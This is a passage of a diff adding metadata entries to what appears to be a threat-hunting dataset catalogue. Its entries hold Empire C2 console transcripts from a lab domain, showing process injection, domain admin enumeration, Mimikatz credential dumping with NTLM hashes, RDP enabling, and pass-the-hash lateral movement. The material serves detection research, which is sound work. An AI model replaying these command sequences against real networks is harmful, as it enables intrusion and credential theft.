172.18.39.5\n\n(Empire: powershell/persistence/elevated/wmi) > \n(Empire: powershell/persistence/elevated/wmi) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n28BNF7RH ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5392   5/0.0    2020-09-04 20:31:17  http            \nW2TBCPHU ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         5584   5/0.0    2020-09-04 20:43:48  http            \n13ZK6G7M ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5676   5/0.0    2020-09-04 20:43:48  http            \n\nPYA28EDF ps 172.18.39.5     WORKSTATION5      *THESHIRE\\SYSTEM        powershell         7480   5/0.0    2020-09-04 20:49:29  http            \n\n(Empire: agents) > interact PYA28EDF\n(Empire: PYA28EDF) > shell whoami\n[*] Tasked PYA28EDF to run TASK_SHELL\n[*] Agent PYA28EDF tasked with task ID 1\n(Empire: PYA28EDF) > \nnt authority\\system\n..Command execution completed.\n\n(Empire: PYA28EDF) > \n(Empire: PYA28EDF) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:30.986938+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518200432.yaml": {
+        "title": "Empire PSInject",
+        "id": "SDWIN-190518200432",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "PE Injection",
+            "WriteProcessMemory",
+            "CreateRemoteThread Execution"
+        ],
+        "description": "This dataset represents adversaries reflectively loading/intecting a portable executable (PE) (not on disk) into a process via WriteprocessMemory and executed via CreateRemoteThread APIs",
+        "attack_mappings": [
+            {
+                "technique": "T1055",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0004",
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_psinject_PEinjection.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "PSInject",
+                    "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/management/Invoke-PSInject.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "[*] Active agents:\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n62HY9XCK ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         3172   5/0.0    2020-08-07 14:30:45  http            \nF82SZKVW ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6008   5/0.0    2020-08-07 18:31:11  http            \n\n(Empire: agents) > interact F82SZKVW\n(Empire: F82SZKVW) > \n(Empire: F82SZKVW) > \n(Empire: F82SZKVW) > usemodule management/psinject\n(Empire: powershell/management/psinject) > \n(Empire: powershell/management/psinject) > set ProcName notepad\n(Empire: powershell/management/psinject) > set Listener http\n(Empire: powershell/management/psinject) > info\n\n              Name: Invoke-PSInject\n            Module: powershell/management/psinject\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @harmj0y\n  @sixdub\n  leechristensen (@tifkin_)\n\nDescription:\n  Utilizes Powershell to to inject a Stephen Fewer formed\n  ReflectivePick which executes PS codefrom memory in a remote\n  process. ProcID or ProcName must be specified.\n\nComments:\n  http://sixdub.net\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        F82SZKVW                  Agent to run module on.                 \n  ProcId           False                                 ProcessID to inject into.               \n  ProcName         False       notepad                   Process name to inject into.            \n  Listener         True        http                      Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/management/psinject) > execute\n[*] Tasked F82SZKVW to run TASK_CMD_JOB\n[*] Agent F82SZKVW tasked with task ID 1\n[*] Tasked agent F82SZKVW to run module powershell/management/psinject\n(Empire: powershell/management/psinject) > \nJob started: F48GDZ\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent Y9RCLV64 checked in\n[+] Initial agent Y9RCLV64 from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to Y9RCLV64 at 172.18.39.5\n\n(Empire: powershell/management/psinject) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n62HY9XCK ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         3172   5/0.0    2020-08-07 14:30:45  http            \nF82SZKVW ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6008   5/0.0    2020-08-07 18:32:51  http            \nY9RCLV64 ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       notepad            2576   5/0.0    2020-08-07 18:32:52  http            \n\n(Empire: agents) >"
+        },
+        "references": [
+            "https://powersploit.readthedocs.io/en/latest/CodeExecution/Invoke-ReflectivePEInjection/",
+            "https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick#psinjectps1"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:31.176289+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518201207.yaml": {
+        "title": "Empire Shell Net Domain Admins",
+        "id": "SDWIN-190518201207",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Domain Groups Enumeration",
+            "RPC SAMR SamrQueryInformationGroup"
+        ],
+        "description": "This dataset represents adversaries enumerating members of domain groups (i.e. Domain Admins) via RPC SAMR interface over SMB. Some of the main RPC methods captured over the network are SamrLookupNamesInDomain (Opnum 17) and SamrQueryInformationGroup (Opnum 20) where there are indicators about the specific group name enumerated.",
+        "attack_mappings": [
+            {
+                "technique": "T1069",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0007"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/host/empire_shell_rpc_samr_smb_group_domain_admins_standard_user.zip"
+            },
+            {
+                "type": "network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/discovery/network/empire_shell_rpc_samr_smb_group_domain_admins_standard_user.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "shell",
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(Empire: stager/multi/launcher) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent GM4LN8V9 checked in\n[+] Initial agent GM4LN8V9 from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to GM4LN8V9 at 172.18.39.6\nagents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            \n\nGM4LN8V9 ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         5724   5/0.0    2020-09-21 08:05:25  http            \n\n(Empire: agents) > interact GM4LN8V9\n(Empire: GM4LN8V9) > shell net group \"Domain Admins\" /domain\n[*] Tasked GM4LN8V9 to run TASK_SHELL\n[*] Agent GM4LN8V9 tasked with task ID 1\n(Empire: GM4LN8V9) > \nThe request will be processed at a domain controller for domain theshire.local.\n\nGroup name     Domain Admins\nComment        Designated administrators of the domain\n\nMembers\n\n-------------------------------------------------------------------------------\nmscott                   pgustavo                 wardog                   \nThe command completed successfully.\n\n..Command execution completed.\n\n(Empire: GM4LN8V9) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:31.355711+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518201922.yaml": {
+        "title": "Empire WDigest Downgrade",
+        "id": "SDWIN-190518201922",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Registry Modification",
+            "Windows Registry WDigest"
+        ],
+        "description": "This dataset represents adversaries setting the UseLogonCredential property value from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest key to 1 to enable plain text passwords.",
+        "attack_mappings": [
+            {
+                "technique": "T1112",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": [
+            {
+                "project": "Threat Hunter Playbook",
+                "name": "WDigest Downgrade",
+                "link": "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190510202010.html"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_wdigest_downgrade.tar.gz"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "wdigest_downgrade",
+                    "script": "https://github.com/EmpireProject/Empire/blob/dev/lib/modules/powershell/management/wdigest_downgrade.py"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": null
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:31.531296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518202151.yaml": {
+        "title": "Empire Mimikatz LogonPasswords",
+        "id": "SDWIN-190518202151",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "LSASS Memory Credentials Read"
+        ],
+        "description": "This dataset represents adversaries reading credentials from the memory contents of lsass.exe. One popular tool performing this behavior is Mimikatz.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": [
+            {
+                "project": "Threat Hunter Playbook",
+                "name": "LSASS Access from Non System Account",
+                "link": "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-170105221010.html"
+            }
+        ],
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_mimikatz_logonpasswords.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "credentials",
+                    "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: agents) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n62HY9XCK ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         3172   5/0.0    2020-08-07 14:30:45  http            \nB7Y8G4XC ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         1648   5/0.0    2020-08-07 14:31:46  http            \n\n(Empire: agents) > interact B7Y8G4XC\n(Empire: B7Y8G4XC) > \n(Empire: B7Y8G4XC) > usemodule credentials/mimikatz/logonpasswords*\n(Empire: powershell/credentials/mimikatz/logonpasswords) > info\n\n              Name: Invoke-Mimikatz DumpCreds\n            Module: powershell/credentials/mimikatz/logonpasswords\n        NeedsAdmin: True\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @JosephBialek\n  @gentilkiwi\n\nDescription:\n  Runs PowerSploit's Invoke-Mimikatz function to extract\n  plaintext credentials from memory.\n\nComments:\n  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com\n\nOptions:\n\n  Name  Required    Value                     Description\n  ----  --------    -------                   -----------\n  Agent True        B7Y8G4XC                  Agent to run module on.                 \n\n(Empire: powershell/credentials/mimikatz/logonpasswords) > execute\n[*] Tasked B7Y8G4XC to run TASK_CMD_JOB\n[*] Agent B7Y8G4XC tasked with task ID 1\n[*] Tasked agent B7Y8G4XC to run module powershell/credentials/mimikatz/logonpasswords\n(Empire: powershell/credentials/mimikatz/logonpasswords) > \nJob started: FH5UKE\n\nHostname: WORKSTATION5.theshire.local / S-1-5-21-1363495622-3806888128-621328882\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Aug  4 2020 20:16:54\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # sekurlsa::logonpasswords\n\nAuthentication Id : 0 ; 2868007 (00000000:002bc327)\nSession           : RemoteInteractive from 2\nUser Name         : pgustavo\nDomain            : THESHIRE\nLogon Server      : MORDORDC\nLogon Time        : 8/5/2020 9:46:24 PM\nSID               : S-1-5-21-1363495622-3806888128-621328882-1104\n        msv :\n        [00000003] Primary\n        * Username : pgustavo\n        * Domain   : THESHIRE\n        * NTLM     : 81d310fa34e6a56a31145445891bb7b8\n        * SHA1     : 2a953d745ed80427e309d957d20b0eeca3cd3d69\n        * DPAPI    : be8815c8ec59ddeda43d2301dbc29c2c\n        tspkg :\n        wdigest :\n        * Username : pgustavo\n        * Domain   : THESHIRE\n        * Password : [placeholder]\n        kerberos :\n        * Username : pgustavo\n        * Domain   : THESHIRE.LOCAL\n        * Password : (null)\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 2860578 (00000000:002ba622)\nSession           : RemoteInteractive from 2\nUser Name         : pgustavo\nDomain            : THESHIRE\nLogon Server      : MORDORDC\nLogon Time        : 8/5/2020 9:46:24 PM\nSID               : S-1-5-21-1363495622-3806888128-621328882-1104\n        msv :\n        [00000003] Primary\n        * Username : pgustavo\n        * Domain   : THESHIRE\n        * NTLM     : 81d310fa34e6a56a31145445891bb7b8\n        * SHA1     : 2a953d745ed80427e309d957d20b0eeca3cd3d69\n        * DPAPI    : be8815c8ec59ddeda43d2301dbc29c2c\n        tspkg :\n        wdigest :\n        * Username : pgustavo\n        * Domain   : THESHIRE\n        * Password : [placeholder]\n        kerberos :\n        * Username : pgustavo\n        * Domain   : THESHIRE.LOCAL\n        * Password : (null)\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 2778269 (00000000:002a649d)\nSession           : Interactive from 2\nUser Name         : DWM-2\nDomain            : Window Manager\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:46:21 PM\nSID               : S-1-5-90-0-2\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : [placeholder][placeholder][placeholder]\n        kerberos :\n        * Username : WORKSTATION5$\n        * Domain   : theshire.local\n        * Password : [placeholder][placeholder][placeholder]\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 2776485 (00000000:002a5da5)\nSession           : Interactive from 2\nUser Name         : DWM-2\nDomain            : Window Manager\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:46:21 PM\nSID               : S-1-5-90-0-2\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : [placeholder][placeholder][placeholder]\n        kerberos :\n        * Username : WORKSTATION5$\n        * Domain   : theshire.local\n        * Password : [placeholder][placeholder][placeholder]\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 2771168 (00000000:002a48e0)\nSession           : Interactive from 2\nUser Name         : UMFD-2\nDomain            : Font Driver Host\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:46:20 PM\nSID               : S-1-5-96-0-2\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : [placeholder][placeholder][placeholder]\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 997 (00000000:000003e5)\nSession           : Service from 0\nUser Name         : LOCAL SERVICE\nDomain            : NT AUTHORITY\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:08 PM\nSID               : S-1-5-19\n        msv :\n        tspkg :\n        wdigest :\n        * Username : (null)\n        * Domain   : (null)\n        * Password : (null)\n        kerberos :\n        * Username : (null)\n        * Domain   : (null)\n        * Password : (null)\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 56937 (00000000:0000de69)\nSession           : Interactive from 1\nUser Name         : DWM-1\nDomain            : Window Manager\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:08 PM\nSID               : S-1-5-90-0-1\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : [placeholder][placeholder][placeholder]\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 56865 (00000000:0000de21)\nSession           : Interactive from 1\nUser Name         : DWM-1\nDomain            : Window Manager\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:08 PM\nSID               : S-1-5-90-0-1\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : [placeholder][placeholder][placeholder]        kerberos :\n        * Username : WORKSTATION5$\n        * Domain   : theshire.local\n        * Password : [placeholder][placeholder][placeholder]\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 996 (00000000:000003e4)\nSession           : Service from 0\nUser Name         : WORKSTATION5$\nDomain            : THESHIRE\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:07 PM\nSID               : S-1-5-20\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : [placeholder][placeholder][placeholder]\n        kerberos :\n        * Username : workstation5$\n        * Domain   : THESHIRE.LOCAL\n        * Password : (null)\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 33194 (00000000:000081aa)\nSession           : Interactive from 0\nUser Name         : UMFD-0\nDomain            : Font Driver Host\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:07 PM\nSID               : S-1-5-96-0-0\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : [placeholder][placeholder][placeholder]\n        kerberos :\n        * Username : WORKSTATION5$\n        * Domain   : theshire.local\n        * Password : [placeholder][placeholder][placeholder]\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 33086 (00000000:0000813e)\nSession           : Interactive from 1\nUser Name         : UMFD-1\nDomain            : Font Driver Host\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:07 PM\nSID               : S-1-5-96-0-1\n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : [placeholder][placeholder][placeholder]\n        kerberos :\n        * Username : WORKSTATION5$\n        * Domain   : theshire.local\n        * Password : [placeholder][placeholder][placeholder]\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 31553 (00000000:00007b41)\nSession           : UndefinedLogonType from 0\nUser Name         : (null)\nDomain            : (null)\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:07 PM\nSID               : \n        msv :\n        [00000003] Primary\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * NTLM     : 57ac24b9ba3b6f79dda7f900c75f467b\n        * SHA1     : 8e553476906ead53af282b88aae47d9a6593e9f7\n        tspkg :\n        wdigest :\n        kerberos :\n        ssp :\n        credman :\n        cloudap :\n\nAuthentication Id : 0 ; 999 (00000000:000003e7)\nSession           : UndefinedLogonType from 0\nUser Name         : WORKSTATION5$\nDomain            : THESHIRE\nLogon Server      : (null)\nLogon Time        : 8/5/2020 9:26:06 PM\nSID               : S-1-5-18\n        msv :\n        tspkg :\n        wdigest :\n        * Username : WORKSTATION5$\n        * Domain   : THESHIRE\n        * Password : [placeholder][placeholder][placeholder]\n        kerberos :\n        * Username : workstation5$\n        * Domain   : THESHIRE.LOCAL\n        * Password : (null)\n        ssp :\n        credman :\n        cloudap :\n\nmimikatz(powershell) # exit\nBye!\n\n(Empire: powershell/credentials/mimikatz/logonpasswords) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:31.738297+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518203650.yaml": {
+        "title": "Empire Enable RDP",
+        "id": "SDWIN-190518203650",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Registry Modification",
+            "Windows Registry RDP Settings"
+        ],
+        "description": "This dataset represents adversaries enabling RDP and adding a firewall exception to a compromised system",
+        "attack_mappings": [
+            {
+                "technique": "T1112",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "datasets": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_enable_rdp.tar.gz"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "management",
+                    "script": "https://github.com/EmpireProject/Empire/blob/master/lib/modules/powershell/management/enable_rdp.py"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: TKV35P8X) > usemodule management/enable_rdp*           \n(Empire: powershell/management/enable_rdp) > info\n\n              Name: Enable-RDP\n            Module: powershell/management/enable_rdp\n        NeedsAdmin: True\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @harmj0y\n\nDescription:\n  Enables RDP on the remote machine and adds a firewall\n  exception.\n\nOptions:\n\n  Name  Required    Value                     Description\n  ----  --------    -------                   -----------\n  Agent True        TKV35P8X                  Agent to run module on.                 \n\n(Empire: powershell/management/enable_rdp) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked TKV35P8X to run TASK_CMD_WAIT\n[*] Agent TKV35P8X tasked with task ID 21\n[*] Tasked agent TKV35P8X to run module powershell/management/enable_rdp\n(Empire: powershell/management/enable_rdp) > The operation completed successfully.\n(Empire: powershell/management/enable_rdp) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:31.914297+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518210125.yaml": {
+        "title": "Empire Invoke SMBExec",
+        "id": "SDWIN-190518210125",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "RPC CreateService",
+            "RPC StartService",
+            "SMB Svcctl"
+        ],
+        "description": "This dataset represents adversaries remotely creating and starting a service via RPC methods over SMB named pipes such as svcctl.",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_smbexec_dcerpc_smb_svcctl.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_smbexec_dcerpc_smb_svcctl.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "invoke_smbexec",
+                    "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/lateral_movement/Invoke-SMBExec.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: 7ADX8ZVR) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \n7ADX8ZVR ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         8948   5/0.0    2020-09-20 06:34:21  http            \n\n\n(Empire: agents) > interact 7ADX8ZVR\n(Empire: 7ADX8ZVR) > usemodule lateral_movement/invoke_smbexec\n(Empire: powershell/lateral_movement/invoke_smbexec) > set Hash 81d310fa34e6a56a31145445891bb7b8\n(Empire: powershell/lateral_movement/invoke_smbexec) > set Username pgustavo\n(Empire: powershell/lateral_movement/invoke_smbexec) > set Domain theshire\n(Empire: powershell/lateral_movement/invoke_smbexec) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_smbexec) > set Listener http\n(Empire: powershell/lateral_movement/invoke_smbexec) > info\n\n              Name: Invoke-SMBExec\n            Module: powershell/lateral_movement/invoke_smbexec\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @rvrsh3ll\n\nDescription:\n  Executes a stager on remote hosts using SMBExec.ps1. This\n  module requires a username and NTLM hash\n\nComments:\n  https://raw.githubusercontent.com/Kevin-Robertson/Invoke-\n  